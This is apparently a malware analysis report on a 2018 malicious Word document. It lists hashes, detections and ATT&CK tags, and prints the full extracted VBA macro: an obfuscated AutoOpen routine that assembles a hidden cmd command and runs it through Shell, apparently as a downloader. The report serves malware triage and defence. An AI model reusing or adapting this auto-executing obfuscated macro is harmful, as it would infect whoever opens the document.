Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4cdf7a74edee6809…

MALICIOUS

Office (OLE)

111.0 KB Created: 2018-08-10 18:55:00 Authoring application: Microsoft Office Word First seen: 2018-08-14
MD5: a9685fb0408d61268b959206be7a6e9d SHA-1: 6cb676dd72f42b900a19ddf0a4e8a096dac772bb SHA-256: 4cdf7a74edee6809445cdfe4fcf8a94acd4884612dc731416979bb1f8f621ab0
144 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro attempts to obfuscate its execution by using a series of string concatenations and calls to various functions, ultimately aiming to execute a command. The specific command and its arguments are heavily obfuscated, but the presence of the AutoOpen macro and the general structure strongly suggest a downloader or initial execution payload.

Heuristics 6

  • ClamAV: Doc.Malware.Generic-6666973-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6666973-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12762 bytes
SHA-256: c4e9bd6a3c9933d80d57061c39aeed6fe5a842967e01ced1a8f2af9b21adcd09
Detection
ClamAV: No threats found
Obfuscation or payload: likely
132 of 214 identifiers look randomly generated (e.g. 'hNfIrziVNvNEYQ'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "VXzoOtZVpkqYRd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName Sgn(211519271)
   TypeName 95
   TypeName dwcBFA
   TypeName Atn(PRhtji - pzwJz * 87460 - zFlLNk)
   TypeName PrhbH
Shell@ KeyString(vbKeyC) + JQjiYpwTYJh + wADEWZn + qkocjRXozk + SrLJcKU + jqfOKroKkj + UVMStnSwnuS + cXoQHhaw + XfuLUTYcN + qjOpKzfk + khOUbITmDB + SwAEVG + hNfIrziVNvNEYQ + SRmwQuwFmolR, 748164825 - 748164825
   TypeName Oct(7415 + wBbjOc)
   TypeName Hex(820)
End Sub


Attribute VB_Name = "HqzoUYE"
Function qkocjRXozk()
On Error Resume Next
TypeName 8
   TypeName 5
   TypeName CBool(uUwTP / BCNfj + IjllC * Jtdss)
pMjuPE = "md" + " /" + "V" + ":" + "ON" + "/" + "C" + CStr(Chr(HkvQaIqZq + jJuaHnM + 34 + OkbwZzio + optdlER)) + "s"
TypeName 952
   TypeName 177591525
iDYaVqOhNV = "e" + "t #" + " " + "  =" + "wjt" + "h" + "MMi" + "M"
TypeName Sqr(115314270)
   TypeName Sqr(ciqCu)
jtChbj = "Ur" + "v" + "GUs" + "Cvw" + "HW" + "NTV" + "r" + "p=" + "/" + "xo" + "au-" + "b"
TypeName TFrDZY
   TypeName Log(2157)
   TypeName 72
YPNfmVUj = "lS9" + "P:)" + "(7" + "n" + "6y}"
TypeName 255
   TypeName Atn(9305)
   TypeName Rnd(MmikC)
sGYKrBwj = "B;e" + "Fz3" + "1," + "d" + "{Xk"
TypeName CLng(NEQiD)
   TypeName Cos(86757 / Coilz)
   TypeName Hex(81161 - mpTMsw / GsKWE * KZtrF)
ItdcqrhcmO = "gc" + "Y$D" + "m" + " '\" + "IKf"
TypeName qwOUw
   TypeName CSng(MRbjP)
   TypeName Oct(NIwAIq)
IMqDsNdUS = ".q" + "@E" + "+" + "R&" + "&fo" + "r " + "%p" + " in" + " ("
TypeName CBool(96112 - ZWZXr + 56737 / CMPwwB)
   TypeName blzDiW
UsqaiVMp = "2" + "3," + "2" + "7,1" + "6," + "46," + "22," + "13" + ",3," + "4" + "6" + ",3"
TypeName Atn(67)
   TypeName CStr(MktFL)
   TypeName Rnd(8)
BKfcBXj = "2" + ",32" + ",62" + ",59" + ",2" + "3," + "6" + "6,4" + "8,2" + "4,4"
TypeName 7
   TypeName 77
   TypeName 17
tBfKuqqDVpC = "0," + "46" + "," + "16," + "3" + "0,2"
TypeName Chr(pRVWF / SpiZiZ)
   TypeName TFQzX
   TypeName mzsLz
zrCEtPV = "7" + ",31" + ",1" + ",4" + "6,5" + "7"
TypeName 54
   TypeName Sqr(qjLKrw - jEkAnW - 38042 - iGwQl)
   TypeName CSng(36877 - ADhIXl / 45669 + ZJapLv)
psNkbziiCi = "," + "2," + "62" + "," + "1" + "9" + ",46" + ",2," + "6" + "8" + ",18" + "," + "4"
TypeName CLng(VuYDvS + 48933 + FCXNT + MSJnO)
   TypeName 66
   TypeName CSng(460072517)
PnfWlL = "6," + "3" + "1," + "14" + "," + "3" + "2" + ",6" + ","
qkocjRXozk = pMjuPE + iDYaVqOhNV + jtChbj + YPNfmVUj + sGYKrBwj + ItdcqrhcmO + IMqDsNdUS + UsqaiVMp + BKfcBXj + tBfKuqqDVpC + zrCEtPV + psNkbziiCi + PnfWlL
   TypeName Cos(19996 / tmOFZ * zIPjN - UNMpLc)
   TypeName Rnd(PNNti)
   TypeName 423450039
End Function
Function SrLJcKU()
On Error Resume Next
TypeName CStr(pChJp)
   TypeName 1059
   TypeName qmusd
vznVCcFb = "46," + "40," + "2," + "45," + "59," + "21," + "71"
TypeName Rnd(78)
   TypeName Round(18040 * zMfzwu)
   TypeName 9
HQuHjnR = ",67" + ",24" + ",6" + "3," + "3" + ",2," + "2," + "23" + ","
TypeName Round(971)
   TypeName Sin(iGiYL / VYDrKH / 51611 - sblcjm)
ljZzjDHRc = "3" + "6,2" + "5,2" + "5" + ",28" + "," + "61"
TypeName Sqr(64405 / FfGwoF)
   TypeName Round(ZTISvQ + HoJrkI)
JfrXu = ",46" + ",5" + "2,6" + ",27" + ",4"
TypeName APSOm
   TypeName Rnd(201076278)
   TypeName 525
JmKwkvO = "0," + "6" + "8" + ",4" + "0," + "4" + "6,2" + ",25" + ",29" + ",1" + "9"
TypeName Chr(117133175)
   TypeName CByte(siCdmB / SRzIT + 28011 / sjFvsE)
NBHoJQOXV = "," + "7" + "," + "12" + "," + "49," + "34," + "44"
TypeName Cos(59)
   TypeName cPaoa
wDAGGP = ",70" + "," + "3" + ",2," + "2," + "23" + ",3" + "6" + ",25"
TypeName 202309463
   TypeName Sqr(YpNCC)
   TypeName 1
jLcazYaNlpm = "," + "25," + "3" + "1" + "," + "6,5" + "7,"
TypeName kZjddf
   TypeName CLng(KwzmUa)
   TypeName CDbl(XbOsu)
RtUVbJWOdT = "6," + "57" + "," + "29," + "32," + "2,2" + "9,2" + "2," + "28," + "31," + "57,"
TypeName hanNc
   TypeName CBool(pFfiCc)
   TypeName Round(586)
wdowEU = "4" + "0," + "68," + "5" + "7" + ",27" + "," + "61," + "25" + "," + "4" + "1,1" + "3"
SrLJcKU = vznVCcFb + HQuHjnR + ljZzjDHRc + JfrXu + JmKwkvO + NBHoJQOXV + wDAGGP + jLcazYaNlpm + RtUVbJWOdT + wdowEU
   TypeName Rnd(7763)
   TypeName Oct(patquL)
End Function
Function jqfOKroKkj()
On Error Resume Next
TypeName WutWJ
   TypeName 335
jMmupz = ",34" + ",39" + ",1," + "58" + ",48" + "," + "2" + "8,7"
TypeName 3944
   TypeName Atn(436225468)
   TypeName 940
JaIQcjwri = "0" + ",3," + "2" + ",2," + "23," + "36," + "25," + "2"
TypeName wmhREY
   TypeName Tan(15997 * NwCriY / VAzENw / vtzTB)
   TypeName CByte(298013308)
bOFKjU = "5," + "15," + "2" + "8," + "32" + ",4" + "6," + "40,"
TypeName RSdwI
   TypeName Hex(293095284)
   TypeName 8
IdouPRCDPUS = "4" + "6," + "2" + "," + "6," + "40" + ",2"
TypeName ChrB(96149 - vpIMw)
   TypeName 149
nCbMbos = "," + "46" + ",22" + ",40" + "," + "46," + "2"
TypeName Fix(kdcvQJ)
   TypeName Atn(ZzMiiL)
   TypeName dbwkHm
DHwjkFiKnnA = ",6" + "8," + "57" + ",27" + ",61" + ",68" + ",3" + "1," + "22"
jqfOKroKkj = jMmupz + JaIQcjwri + bOFKjU + IdouPRCDPUS + nCbMbos + DHwjkFiKnnA
   TypeName Round(arsJrZ / UUEhpW / 24776 * nPHdqT)
   TypeName 647
   TypeName CSng(MjXEkq / FzOqSd)
End Function
Function UVMStnSwnuS()
On Error Resume Next
TypeName Int(6)
   TypeName Log(JNGLGG)
IkpCjZ = ",25" + "," + "49" + "," + "73" + "," + "5" + "2,"
TypeName 160626531
   TypeName CLng(iumNmH + wHCbji / cpHWX + wYDJJ)
   TypeName Fix(kFcJwn + 95604 - KMBEK + UaYFZi)
SWTJq = "2," + "1" + "5,7" + "0," + "3," + "2" + "," + "2," + "23," + "36" + ",25" + ","
TypeName Round(31991 * sjntGr + 55381 - LdMrf)
   TypeName 49
   TypeName 6998
VqhFzJv = "25," + "56," + "27," + "13" + "," + "3"
TypeName Round(RcGRMc / 58182 + fEksdA / dROADN)
   TypeName zsjVdv
   TypeName 81
IIpGN = ",2" + "7" + ",1" + "6," + "57,"
TypeName NRnsa
   TypeName PIMYT
azlTYci = "28" + ",2" + "2" + ",6" + "8,5" + "7,2" + "7" + "," + "61,"
TypeName Rnd(BCbOw * ZzsJZf)
   TypeName 155
TIIfTzWc = "25" + "," + "34" + ",73" + ",21"
TypeName CInt(99808 + HqPiBl)
   TypeName CBool(poEFLi)
buzXUi = ",69" + "," + "28" + ",5" + "4," + "7" + "0," + "3,2" + ","
TypeName Oct(bsDNh)
   TypeName SuiArD
IqMUhd = "2," + "23," + "36" + "," + "2" + "5" + ",25" + "," + "1" + "6" + ",3"
TypeName 3113
   TypeName CBool(MclcAR)
   TypeName Fix(43970 / pUthf / zzZKw * 27125)
FbtJYkA = ",4" + "6,4" + "6" + ",3" + "2," + "31," + "28" + ",3" + "2" + ",28" + ",40"
TypeName Int(vQimKJ * tOuWU * VARND / RwidX)
   TypeName Sgn(QGCqAm - ztPSw + jabTra - TYNDAr)
   TypeName ChrB(IstzpJ)
rjlBvMzCnw = ",5" + "7,4" + "6,2" + "," + "22," + "2" + "8," + "6" + ",4" + "0" + ",6," + "40" + ",56"
TypeName hfllUh
   TypeName 74
nnNdwowqNUK = ",6" + "8" + ",57" + "," + "27,"
TypeName TzXvp
   TypeName 3794
   TypeName npNnLm
RWMWXFu = "6" + "1" + "," + "25" + ",3" + "4" + "," + "6"
UVMStnSwnuS = IkpCjZ + SWTJq + VqhFzJv + IIpGN + azlTYci + TIIfTzWc + buzXUi + IqMUhd + FbtJYkA + rjlBvMzCnw + nnNdwowqNUK + RWMWXFu
   TypeName 7381
   TypeName Hex(APFNo + RYkhRS)
End Function
Function cXoQHhaw()
On Error Resume Next
TypeName Round(501543854)
   TypeName 8371
GWLHEIizi = ",32" + "," + "63," + "68" + "," + "33" + ","
TypeName Sgn(UzJrV)
   TypeName 898
   TypeName Rnd(qoVtKk / hzTHRo + 60897 + KIfUqY)
UzhjbafnA = "23," + "3" + "2," + "6" + "," + "2," + "38,"
TypeName Int(25551 * vkbjOo - 13413 / zkYkub)
   TypeName sKpzC
   TypeName Sgn(100467305)
ofjQQQOvKu = "63," + "70," + "63" + "," + "37," + "45" + ",5"
TypeName AzuAi
   TypeName AMBCWw
   TypeName Sin(11905 / WEEQv)
ERObww = "9" + "," + "6" + ",6" + "5," + "54,"
TypeName ChrW(2284)
   TypeName 503764122
   TypeName Atn(TwORiK + QFAqsN * dCnHmz * hiiFX)
wKAtUf = "62" + ",2" + "4" + ",6" + "2," + "63," + "50,"
cXoQHhaw = GWLHEIizi + UzhjbafnA + ofjQQQOvKu + ERObww + wKAtUf
   TypeName Hex(jnOJif - wjRkV + lFZdq / mtjRzv)
   TypeName Tan(TjLKjZ)
End Function
Function XfuLUTYcN()
On Error Resume Next
TypeName 2365
   TypeName jfwVDE
   TypeName CInt(4750 / qwZEbh)
WZomVXIQM = "4" + "1" + ",3" + "4,6" + "3" + "," + "4"
TypeName zWOOzt
   TypeName ChrB(3459)
ufjWQWwjMmP = "5,5" + "9" + ",6" + "5," + "35,"
TypeName CLng(559)
   TypeName Tan(425541703)
ktmOOiMPlX = "2," + "24" + ",5" + "9," + "46," + "4" + "0"
TypeName CLng(470)
   TypeName swuLf
zWRLciNa = ",15" + ",36" + ",2," + "46," + "61," + "2" + "3," + "72,"
TypeName 1
   TypeName CLng(zTspui)
   TypeName kHcaqN
wLRRT = "63," + "6" + "4" + "," + "63," + "7" + "2," + "59" + ",6" + ",6" + "5,5"
TypeName CByte(5890 - njjBfB + jGhVTB * WvQuH)
   TypeName kncPoM
   TypeName Atn(113459832)
CfmOizoh = "4" + ",72" + "," + "63" + ",68" + ",46" + ",2" + "6," + "4" + "6," + "63,"
TypeName 76
   TypeName Round(cjCvrv)
   TypeName ENYDHR
MACwzMubmjV = "4" + "5," + "67" + "," + "2" + "7" + "," + "2" + "2,4" + "6,2" + "8,"
TypeName ChrB(vwbYz)
   TypeName 7506
jSDRv = "57" + "," + "3," + "3" + "8" + ",5" + "9,6"
TypeName CDate(13954 * qoAiVI)
   TypeName Sgn(RDaDVF)
vLsKHn = "6,1" + "6,4" + "7" + ",62" + ",6," + "40," + "62" + ",5" + "9" + "," + "2" + "1" + ",7"
TypeName Cos(92)
   TypeName 8
cvtcFtMREYI = "1" + "," + "67," + "3" + "7," + "53," + "2,"
XfuLUTYcN = WZomVXIQM + ufjWQWwjMmP + ktmOOiMPlX + zWRLciNa + wLRRT + CfmOizoh + MACwzMubmjV + jSDRv + vLsKHn + cvtcFtMREYI
   TypeName ChrW(wiqjG / zHdwAC * 69575 - zCEiC)
   TypeName CInt(7)
End Function
Function qjOpKzfk()
On Error Resume Next
TypeName Tan(SdrbVI)
   TypeName Atn(12074 - JmnIzT + hKjNV * YTLHO)
   TypeName Round(KpDYtX)
zErFpEHNzm = "22," + "42" + ",5" + "3" + ",5" + "9,2" + "3,6" + "6," + "48," + "68," + "60," + "27"
TypeName CLng(4206)
   TypeName 8721
   TypeName 2
bbYrA = "," + "16," + "40" + ",32" + ",27" + "," + "28" + ",5" + "2,4" + "7,6" + ",32" + ","
TypeName CInt(JtzWpE)
   TypeName Sin(19946 - kiMTP)
pFidUzqiCil = "4" + "6,3" + "8," + "5" + "9" + ",6" + "6," + "16" + ",4" + "7" + "," + "5"
TypeName 650
   TypeName Chr(uEHfU - OOaRIT)
   TypeName Log(1)
ACGczQvXE = "1," + "62," + "59" + "," + "6" + "5,3" + "5,"
TypeName 204696817
   TypeName 613
   TypeName VoSJKo
iVHtPzJzJz = "2" + "," + "37" + "," + "45" + ",33" + ",2" + "," + "2" + "8" + ","
TypeName ChrW(71)
   TypeName CSng(aIwrw)
HQfzDII = "22" + ",2," + "30," + "3" + "5" + ",22" + ",2"
TypeName iiZPI
   TypeName 9
   TypeName Log(BBCwb)
VkXrHzSB = "7," + "57" + ",4" + "6," + "1"
qjOpKzfk = zErFpEHNzm + bbYrA + pFidUzqiCil + ACGczQvXE + iVHtPzJzJz + HQfzDII + VkXrHzSB
   TypeName 332
   TypeName 34
End Function
Function khOUbITmDB()
On Error Resume Next
TypeName Tan(91992 * uTqPNC)
   TypeName Cos(URWTf)
HrzQaAilk = "3,1" + "3,6" + "2,5" + "9," + "6"
TypeName FGfrf
   TypeName Log(3)
   TypeName CLng(76565 + WklmW)
IrHCBqwVrn = "5,3" + "5,2" + ",4" + "5," + "3" + "1," + "22" + ",46" + ",2" + "8," + "55,"
TypeName 3958
   TypeName 838
   TypeName Sqr(35778 - iPoJB)
okWFA = "45" + ",43" + "," + "57" + ",2" + "8" + ",2," + "5" + "7" + "," + "3,5" + "3,"
TypeName EECjCN
   TypeName jTPrHU
   TypeName CSng(200)
FQAHhsAMw = "43" + ",4" + "3," + "62," + "62" + "," + "62," + "6" + "2,6" + "2"
TypeName Chr(FZETtB - SDUti + 2166 + 87165)
   TypeName CInt(61105 + cCAKhh)
   TypeName ChrB(83804423)
pzciBzdD = "," + "62" + "," + "62" + ",62" + "," + "62" + "," + "6" + "2," + "62" + ",6" + "2"
TypeName 4
   TypeName Log(jzIciI / KjYqWz)
   TypeName bilwJ
zDMlPIj = ",62" + ",6" + "2" + ",62" + ",62" + "," + "62" + ","
TypeName GzpAvl
   TypeName Int(nzIAzi + 57548)
   TypeName CBool(75)
FDaHuUw = "8" + "0)d" + "o " + "set" + " " + "~  " + "  =" + "!~ " + "   " + "!!#" + "  "
TypeName CStr(CBOfSD + AVqafC)
   TypeName Atn(thjunj)
qOWOoIrDAzW = " :~" + "%" + "p," + "1!" + "&" + "&if" + " %" + "p " + "geq" + " 80" + " ca" + "ll" + " "
khOUbITmDB = HrzQaAilk + IrHCBqwVrn + okWFA + FQAHhsAMw + pzciBzdD + zDMlPIj + FDaHuUw + qOWOoIrDAzW
   TypeName CBool(5)
   TypeName Int(bKqYv - izPlML)
   TypeName CBool(1834)
End Function
Function SwAEVG()
On Error Resume Next
TypeName CInt(462178316)
   TypeName 6067
XEkwBX = "%" + "~ " + "   " + ":" + "*~"
TypeName YIDHQ
   TypeName Sgn(uHqTin)
   TypeName CDate(YPnwzz)
FKudlhzwH = "  " + "  !" + "=" + "%" + CStr(Chr(pVGqKtUwQDblUJ + XJzqbaC + 34 + wOnfIWpzRqnHt + FARlsQU)) + "  " + " "
SwAEVG = XEkwBX + FKudlhzwH
   TypeName 252469504
   TypeName Atn(jocjB)
   TypeName 6
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.